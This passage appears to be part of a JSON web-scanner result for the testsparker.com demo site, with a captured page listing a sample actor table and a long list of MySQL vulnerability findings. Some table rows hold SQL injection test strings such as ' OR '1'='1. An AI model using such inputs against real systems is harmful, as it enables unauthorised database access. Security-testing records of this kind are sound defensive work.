    \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    IDNameSURNAMECREATION DATE
    2 NICK WAHLBERG 2006-02-15 04:34:33
    3 ED CHASE 2006-02-15 04:34:33
    4 JENNIFER DAVIS 2006-02-15 04:34:33
    5 JOHNNY LOLLOBRIGIDA 2006-02-15 04:34:33
    6 BETTE NICHOLSON 2006-02-15 04:34:33
    7 GRACE MOSTEL 2006-02-15 04:34:33
    8 MATTHEW JOHANSSON 2006-02-15 04:34:33
    9 JOE SWANK 2006-02-15 04:34:33
    10 CHRISTIAN GABLE 2006-02-15 04:34:33
    11 ZERO CAGE 2006-02-15 04:34:33
    12 KARL BERRY 2006-02-15 04:34:33
    13 UMA WOOD 2006-02-15 04:34:33
    14 VIVIEN BERGEN 2006-02-15 04:34:33
    15 CUBA OLIVIER 2006-02-15 04:34:33
    16 FRED COSTNER 2012-03-13 12:14:54 22
    17 HELEN VOIGHT 2012-03-13 12:14:54 22
    18 DAN TORN 2012-03-13 12:14:54 22
    19 BOB FAWCETT 2012-03-13 12:14:54 22
    20 LUCILLE TRACY 2012-03-13 12:14:54 22
    21 KIRSTEN PALTROW 2012-03-13 12:14:54 22
    22 ELVIS MARX 2012-03-13 12:14:54 22
    23 SANDRA KILMER 2012-03-13 12:14:54 22
    24 CAMERON STREEP 2012-03-13 12:14:54 22
    25 KEVIN BLOOM 2012-03-13 12:14:54 22
    26 RIP CRAWFORD 2012-03-13 12:14:54 22
    27 JULIA MCQUEEN 2012-03-13 12:14:54 22
    28 WOODY HOFFMAN 2012-03-13 12:14:54 22
    29 ALEC WAYNE 2012-03-13 12:14:54 22
    30 SANDRA PECK 2012-03-13 12:14:54 22
    31 SISSY SOBIESKI 2012-03-13 12:14:54 22
    32 TIM HACKMAN 2012-03-13 12:14:54 22
    33 MILLA PECK 2012-03-13 12:14:54 22
    34 AUDREY OLIVIER 2012-03-13 12:14:54 22
    35 JUDY DEAN 2012-03-13 12:14:54 22
    36 BURT DUKAKIS 2012-03-13 12:14:54 22
    37 VAL BOLGER 2012-03-13 12:14:54 22
    38 TOM MCKELLEN 2012-03-13 12:14:54 22
    39 GOLDIE BRODY 2012-03-13 12:14:54 22
    40 JOHNNY CAGE 2012-03-13 12:14:54 22
    41 JODIE DEGENERES 2012-03-13 12:14:54 22
    42 TOM MIRANDA 2012-03-13 12:14:54 22
    43 KIRK JOVOVICH 2012-03-13 12:14:54 22
    44 NICK STALLONE 2012-03-13 12:14:54 22
    45 REESE KILMER 2012-03-13 12:14:54 22
    46 PARKER GOLDBERG 2012-03-13 12:14:54 22
    47 JULIA BARRYMORE 2012-03-13 12:14:54 22
    48 FRANCES DAY-LEWIS 2012-03-13 12:14:54 22
    49 ANNE CRONYN 2012-03-13 12:14:54 22
    50 NATALIE HOPKINS 2012-03-13 12:14:54 22
    51 GARY PHOENIX 2012-03-13 12:14:54 22
    52 CARMEN HUNT 2012-03-13 12:14:54 22
    53 MENA TEMPLE 2012-03-13 12:14:54 22
    54 PENELOPE PINKETT 2012-03-13 12:14:54 22
    55 FAY KILMER 2012-03-13 12:14:54 22
    56 DAN HARRIS 2012-03-13 12:14:54 22
    57 JUDE CRUISE 2012-03-13 12:14:54 22
    58 CHRISTIAN AKROYD 2012-03-13 12:14:54 22
    59 DUSTIN TAUTOU 2012-03-13 12:14:54 22
    60 HENRY BERRY 2012-03-13 12:14:54 22
    61 CHRISTIAN NEESON 2012-03-13 12:14:54 22
    62 JAYNE NEESON 2012-03-13 12:14:54 22
    63 CAMERON WRAY 2012-03-13 12:14:54 22
    64 RAY JOHANSSON 2012-03-13 12:14:54 22
    65 ANGELA HUDSON 2012-03-13 12:14:54 22
    66 MARY TANDY 2012-03-13 12:14:54 22
    67 JESSICA BAILEY 2012-03-13 12:14:54 22
    68 RIP WINSLET 2012-03-13 12:14:54 22
    69 KENNETH PALTROW 2012-03-13 12:14:54 22
    70 MICHELLE MCCONAUGHEY 2012-03-13 12:14:54 22
    71 ADAM GRANT 2012-03-13 12:14:54 22
    72 SEAN WILLIAMS 2012-03-13 12:14:54 22
    73 GARY PENN 2012-03-13 12:14:54 22
    74 MILLA KEITEL 2012-03-13 12:14:54 22
    75 BURT POSEY 2012-03-13 12:14:54 22
    76 ANGELINA ASTAIRE 2012-03-13 12:14:54 22
    77 CARY MCCONAUGHEY 2012-03-13 12:14:54 22
    78 GROUCHO SINATRA 2012-03-13 12:14:54 22
    79 MAE HOFFMAN 2012-03-13 12:14:54 22
    80 RALPH CRUZ 2012-03-13 12:14:54 22
    81 SCARLETT DAMON 2012-03-13 12:14:54 22
    82 WOODY JOLIE 2012-03-13 12:14:54 22
    83 BEN WILLIS 2012-03-13 12:14:54 22
    84 JAMES PITT 2012-03-13 12:14:54 22
    85 MINNIE ZELLWEGER 2012-03-13 12:14:54 22
    86 GREG CHAPLIN 2012-03-13 12:14:54 22
    87 SPENCER PECK 2012-03-13 12:14:54 22
    88 KENNETH PESCI 2012-03-13 12:14:54 22
    89 CHARLIZE DENCH 2012-03-13 12:14:54 22
    90 SEAN GUINESS 2012-03-13 12:14:54 22
    91 CHRISTOPHER BERRY 2012-03-13 12:14:54 22
    92 KIRSTEN AKROYD 2012-03-13 12:14:54 22
    93 ELLEN PRESLEY 2012-03-13 12:14:54 22
    94 KENNETH TORN 2012-03-13 12:14:54 22
    95 DARYL WAHLBERG 2012-03-13 12:14:54 22
    96 GENE WILLIS 2012-03-13 12:14:54 22
    97 MEG HAWKE 2012-03-13 12:14:54 22
    98 CHRIS BRIDGES 2012-03-13 12:14:54 22
    99 JIM MOSTEL 2012-03-13 12:14:54 22
    100 SPENCER DEPP 2012-03-13 12:14:54 22
    101 SUSAN DAVIS 2012-03-13 12:14:54 22
    102 WALTER TORN 2012-03-13 12:14:54 22
    103 MATTHEW LEIGH 2012-03-13 12:14:54 22
    104 PENELOPE CRONYN 2012-03-13 12:14:54 22
    105 SIDNEY CROWE 2012-03-13 12:14:54 22
    106 GROUCHO DUNST 2012-03-13 12:14:54 22
    107 GINA DEGENERES 2012-03-13 12:14:54 22
    108 WARREN NOLTE 2012-03-13 12:14:54 22
    109 SYLVESTER DERN 2012-03-13 12:14:54 22
    110 SUSAN DAVIS 2012-03-13 12:14:54 22
    111 CAMERON ZELLWEGER 2012-03-13 12:14:54 22
    112 RUSSELL BACALL 2012-03-13 12:14:54 22
    113 MORGAN HOPKINS 2012-03-13 12:14:54 22
    114 MORGAN MCDORMAND 2012-03-13 12:14:54 22
    115 HARRISON BALE 2012-03-13 12:14:54 22
    116 DAN STREEP 2012-03-13 12:14:54 22
    117 RENEE TRACY 2012-03-13 12:14:54 22
    118 CUBA ALLEN 2012-03-13 12:14:54 22
    119 WARREN JACKMAN 2012-03-13 12:14:54 22
    120 PENELOPE MONROE 2012-03-13 12:14:54 22
    121 LIZA BERGMAN 2012-03-13 12:14:54 22
    122 SALMA NOLTE 2012-03-13 12:14:54 22
    123 JULIANNE DENCH 2012-03-13 12:14:54 22
    124 SCARLETT BENING 2012-03-13 12:14:54 22
    125 ALBERT NOLTE 2012-03-13 12:14:54 22
    126 FRANCES TOMEI 2012-03-13 12:14:54 22
    127 KEVIN GARLAND 2012-03-13 12:14:54 22
    128 CATE MCQUEEN 2012-03-13 12:14:54 22
    129 DARYL CRAWFORD 2012-03-13 12:14:54 22
    130 GRETA KEITEL 2012-03-13 12:14:54 22
    131 JANE JACKMAN 2012-03-13 12:14:54 22
    132 ADAM HOPPER 2012-03-13 12:14:54 22
    133 RICHARD PENN 2012-03-13 12:14:54 22
    134 GENE HOPKINS 2012-03-13 12:14:54 22
    135 RITA REYNOLDS 2012-03-13 12:14:54 22
    136 ED MANSFIELD 2012-03-13 12:14:54 22
    137 MORGAN WILLIAMS 2012-03-13 12:14:54 22
    138 LUCILLE DEE 2012-03-13 12:14:54 22
    139 EWAN GOODING 2012-03-13 12:14:54 22
    140 WHOOPI HURT 2012-03-13 12:14:54 22
    141 CATE HARRIS 2012-03-13 12:14:54 22
    142 JADA RYDER 2012-03-13 12:14:54 22
    143 RIVER DEAN 2012-03-13 12:14:54 22
    144 ANGELA WITHERSPOON 2012-03-13 12:14:54 22
    145 KIM ALLEN 2012-03-13 12:14:54 22
    146 ALBERT JOHANSSON 2012-03-13 12:14:54 22
    147 FAY WINSLET 2012-03-13 12:14:54 22
    148 EMILY DEE 2012-03-13 12:14:54 22
    149 RUSSELL TEMPLE 2012-03-13 12:14:54 22
    150 JAYNE NOLTE 2012-03-13 12:14:54 22
    151 GEOFFREY HESTON 2012-03-13 12:14:54 22
    152 BEN HARRIS 2012-03-13 12:14:54 22
    153 MINNIE KILMER 2012-03-13 12:14:54 22
    154 MERYL GIBSON 2012-03-13 12:14:54 22
    155 IAN TANDY 2012-03-13 12:14:54 22
    156 FAY WOOD 2012-03-13 12:14:54 22
    157 GRETA MALDEN 2012-03-13 12:14:54 22
    158 VIVIEN BASINGER 2012-03-13 12:14:54 22
    159 LAURA BRODY 2012-03-13 12:14:54 22
    160 CHRIS DEPP 2012-03-13 12:14:54 22
    161 HARVEY HOPE 2012-03-13 12:14:54 22
    162 OPRAH KILMER 2012-03-13 12:14:54 22
    163 CHRISTOPHER WEST 2012-03-13 12:14:54 22
    164 HUMPHREY WILLIS 2012-03-13 12:14:54 22
    165 AL GARLAND 2012-03-13 12:14:54 22
    166 NICK DEGENERES 2012-03-13 12:14:54 22
    167 LAURENCE BULLOCK 2012-03-13 12:14:54 22
    168 WILL WILSON 2012-03-13 12:14:54 22
    169 KENNETH HOFFMAN 2012-03-13 12:14:54 22
    170 MENA HOPPER 2012-03-13 12:14:54 22
    171 OLYMPIA PFEIFFER 2012-03-13 12:14:54 22
    172 GROUCHO WILLIAMS 2012-03-13 12:14:54 22
    173 ALAN DREYFUSS 2012-03-13 12:14:54 22
    174 MICHAEL BENING 2012-03-13 12:14:54 22
    175 WILLIAM HACKMAN 2012-03-13 12:14:54 22
    176 JON CHASE 2012-03-13 12:14:54 22
    177 GENE MCKELLEN 2012-03-13 12:14:54 22
    178 LISA MONROE 2012-03-13 12:14:54 22
    179 ED GUINESS 2012-03-13 12:14:54 22
    180 JEFF SILVERSTONE 2012-03-13 12:14:54 22
    181 MATTHEW CARREY 2012-03-13 12:14:54 22
    182 DEBBIE AKROYD 2012-03-13 12:14:54 22
    183 RUSSELL CLOSE 2012-03-13 12:14:54 22
    184 HUMPHREY GARLAND 2012-03-13 12:14:54 22
    185 MICHAEL BOLGER 2012-03-13 12:14:54 22
    186 JULIA ZELLWEGER 2012-03-13 12:14:54 22
    187 RENEE BALL 2012-03-13 12:14:54 22
    188 ROCK DUKAKIS 2012-03-13 12:14:54 22
    189 CUBA BIRCH 2012-03-13 12:14:54 22
    190 AUDREY BAILEY 2012-03-13 12:14:54 22
    191 GREGORY GOODING 2012-03-13 12:14:54 22
    192 JOHN SUVARI 2012-03-13 12:14:54 22
    193 BURT TEMPLE 2012-03-13 12:14:54 22
    194 MERYL ALLEN 2012-03-13 12:14:54 22
    195 JAYNE SILVERSTONE 2012-03-13 12:14:54 22
    196 BELA WALKEN 2012-03-13 12:14:54 22
    197 REESE WEST 2012-03-13 12:14:54 22
    198 MARY KEITEL 2012-03-13 12:14:54 22
    199 JULIA FAWCETT 2012-03-13 12:14:54 22
    200 THORA TEMPLE 2012-03-13 12:14:54 22
    412 -1 OR 1=1 test 2012-03-13 12:14:54 22
    413 -1 OR 1=1 test 2012-03-13 12:14:54 22
    414 NS1NO test 2012-03-13 12:14:54 22
    415 1 AND 'NS='ss test 2012-03-13 12:14:54 22
    416 ' OR 'ns'='ns test 2012-03-13 12:14:54 22
    417 -1 OR 17-7=10 test 2012-03-13 12:14:54 22
    418 1 OR X='ss test 2012-03-13 12:14:54 22
    419 ' OR '1'='1 test 2012-03-13 12:14:54 22
    420 ' OR '1'='1 test 2012-03-13 12:14:54 22

    \n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \n\n
    \n\tThis website is automatically reset at every midnight (00:00 - UTC).\n
    \n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "b89d9038-b732-471a-657c-ad49020ee0ad", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Use of a Broken or Risky Cryptographic Algorithm Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, 